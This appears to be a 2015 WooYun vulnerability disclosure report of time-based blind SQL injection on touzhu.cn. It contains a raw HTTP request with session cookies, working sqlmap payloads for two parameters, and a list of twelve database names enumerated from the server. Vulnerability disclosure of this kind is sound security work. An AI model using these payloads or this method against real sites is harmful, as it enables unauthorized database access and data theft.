WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
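2015-09-23: Details reported to the vendor; awaiting vendor handling
2015-09-23: Vendor confirmed; details disclosed to the vendor only
2015-10-03: Details disclosed to core white hats and experts in related fields
2015-10-13: Details disclosed to regular white hats
2015-10-23: Details disclosed to intern white hats
2015-11-07: Details disclosed to the public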
As the title says.
1. www.touzhu.cn/news/newslist/*/_1.html (pseudo-static URL, location 1)
2. www.touzhu.cn/customer/ajax_findpass.php/actionc=checknickname&nickname=*&suijishu=0.10779594886116683&username=e (pseudo-static URL, location 2)
GET /webllpay/return.php?a=hqp2008&c=500.00&key=rtiz65&m=*&user_id=hqp2008&valid_order=100&version=1.0 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.touzhu.cn:80/
Cookie: PHPSESSID=69cbkfr3nooccakbg7763o4ct0; helpskaiguan=CaiSo; Hm_lvt_099264dbbc75fb6766d7d0a7155abbcc=1442884338,1442884446,1442884717,1442898093; Hm_lpvt_099264dbbc75fb6766d7d0a7155abbcc=1442898093; HMACCOUNT=457185A9BB06EA8F; box_wxts=on; bdshare_firstime=1442881660036; BAIDUID=DC1506772BE8531E2289EA15456B3920:FG=1
Host: www.touzhu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The m parameter is injectable; now running sqlmap against it.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: actionc=checknickname&nickname=' AND (SELECT * FROM (SELECT(SLEEP(5)))yaYG) AND 'sgEm'='sgEm&suijishu=0.10779594886116683&username=e
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0.12
No tables found

sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.touzhu.cn:80/webllpay/return.php?a=hqp2008&c=500.00&key=rtiz65&m=' AND (SELECT * FROM (SELECT(SLEEP(5)))pZkW) AND 'SfwF'='SfwF&user_id=hqp2008&valid_order=100&version=1.0
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0.12

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.touzhu.cn:80/webllpay/return.php?a=hqp2008&c=500.00&key=rtiz65&m=' AND (SELECT * FROM (SELECT(SLEEP(5)))pZkW) AND 'SfwF'='SfwF&user_id=hqp2008&valid_order=100&version=1.0
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0.12
available databases [12]:
[*] asiancup2015
[*] caiso
[*] caiso_test
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpstudy
[*] starapp
[*] starapp_test
[*] test
[*] whchem_com
[*] yqjc
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-09-23 12:06
Thanks, 路大, for the attention. This has been passed on to the developers.
None yet